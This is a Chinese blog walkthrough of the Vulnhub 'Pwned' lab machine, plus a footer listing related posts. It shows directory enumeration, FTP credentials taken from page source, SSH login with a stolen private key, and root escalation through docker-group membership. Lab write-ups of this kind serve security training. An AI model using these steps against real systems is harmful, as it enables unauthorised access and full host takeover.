Pwned Vulnhub
在浏览器输入地址打开网页
端口扫描
发现仅仅就开了三个端口;
目录枚举
使用gobuster工具发现了几个目录,接下来进行探测;
gobuster dir -u http://10.36.201.103/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
3.1发现hidden_text目录下存在一个secret.dic文件,打开之后都是一些目录,下载下来之后使用gobuster工具进行枚举;
gobuster dir -u http://10.36.201.103/ -w secret.dic
在浏览器打开这个目录pwned.vuln发现是一个登录框;
查看网页源代码发现了ftp用户名和密码;
$un==‘ftpuser’ && $pw==‘B0ss_B!TcH’
4. 登录ftp,查看有没有敏感信息;
发现了id_rsa,和note.txt文件,查看note.txt内容之后存在用户ariana,猜测这是
ariana的私钥,接下来进行组合登录;
ssh登录
修改id_rsa权限为600,使用ssh -i id_rsa ariana@10.36.201.103命令登录,成功进入系统;
查找有sudo权限的文件;
Sudo -l
发现home目录下存在一个可利用脚本,打开脚本查看内容存在漏洞;
脚本利用
这个脚本文件需要使用selena用户, sudo -u selena /home/messenger.sh;
用户属于docker组漏洞利用
使用id命令发现selena属于用户组docker,接下来使用命令
docker run -v /:/hostOS -i -t chrisfosterelli/rootplease
附docker利用提权链接:https://blog.csdn.net/qq_41918771/article/details/103666135
Pwned Vulnhub相关推荐
- 渗透测试靶机搭建_对vulnhub中Android4靶机渗透测试全过程!
Android4靶机简介 名称:Android4 操作系统:Android v4.4 标志:/data/root/(在此目录中) 等级:初学者. 下载链接:Android4:https://downl ...
- Vulnhub靶机渗透之 RAVEN: 1
目录 Description 网卡信息 信息收集 主机发现 主机存活扫描 端口扫描 网站信息 网站首页 nikto 报告 service 页面 wordpress 渗透过程 SSH 爆破 Hydr 命 ...
- [网络安全自学篇] 六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步.前文分享了SMBv3服务远程代码执行漏洞(CVE-2020-0796),攻击者可 ...
- 【Vulnhub靶机系列】DC2
基本信息 Kali:192.168.61.145 DC2:192.168.61.162 实验过程 在Kali中先进行内网探活 sudo arp-scan --interface eth0 192.16 ...
- 【Vulnhub靶机系列】DC1
基本信息 Kali: 192.168.56.116 DC1: 192.168.56.115 实验过程 先在Kali中使用arp-scan进行主机探活 sudo arp-scan --interface ...
- 利用Vulnhub复现漏洞 - JBoss JMXInvokerServlet 反序列化漏洞
JBoss JMXInvokerServlet 反序列化漏洞 Vulnhub官方复现教程 漏洞原理 复现过程 启动环境 端口设置 浏览器设置 BurpSuit设置 复现漏洞 序列化数据生成 发送POC ...
- 靶场练习第二十二天~vulnhub靶场之Momentum-2
一.准备工作 靶机下载地址:Momentum: 2 ~ VulnHub 1.查看kali的ip 使用命令ifconfig 2.使用nmap命令 nmap 192.168.101.0/24 查看开放的端 ...
- 靶场练习第二十五天~vulnhub靶场之Raven-2
一.准备工作 kali和靶机都选择NAT模式(kali与靶机同网段) 1.靶场环境 下载链接:Raven: 2 ~ VulnHub 2.kali的ip 命令:ifconfig 3.靶机的ip 扫描靶机 ...
- 靶场练习第二十天~vulnhub靶场之Funbox: Scriptkiddie
一.环境搭建 靶官网机下载地址:Funbox: Scriptkiddie ~ VulnHub 百度云盘下载链接: 百度网盘 请输入提取码 提取码: i4a9 二.信息收集 1.nmap命令扫描靶机 先 ...
- 靶场练习第一天~vulnhub靶场之Me-and-My-Girlfriend-1
兄弟们第一天打vulnhub靶场,我kali连靶场ip都扫不到,泪奔了,不说了开整 注意: vm虚拟机里面的编辑下面的虚拟机网络编辑器,把除了NAT模式外的模式,其他模式不启动. 至于为什么要这样操作 ...
最新文章
- 竹笋炒肉 I18N和L10N
- java的知识点45——事务||测试时间处理(java.sql.date,time,timestamp)
- ES6学习笔记(十六)async函数
- Write a simple HTML Browser(hdu1088)
- html调用文章标题,HTML中文章标题标签的详细介绍
- 两场直播丨 手把手安装搭建GoldenDB、基于IB网络的Oracle Extend RAC最佳实践
- 深度学习CNN系列笔记
- 一个白学家眼里的 WebAssembly
- oracle装载数据,如何在SqlLoader中装载日期型的数据
- 天翼云虚拟IP地址及其在高可用集群中的应用
- FMEA-MSR 步骤五:风险分析(一)
- java右移位_Java移位运算符详解实例
- 数据挖掘的9大成熟技术和应用
- 技术交底书(三)-----一种虚拟现实共享及三维空间共享系统
- matlab的蝶形运算,第五章快速傅里叶变换(蝶形运算).ppt
- 【Python】爬虫-----下载B站视频
- 电池SOC仿真系列-基于RNN的电池SOC估算研究
- 实战八:美国人口普查数据进行收入预测分类
- VS Code 修改字体 + 取消注释斜体 + 修改注释颜色
- 大学英语四级电子照片修改过程。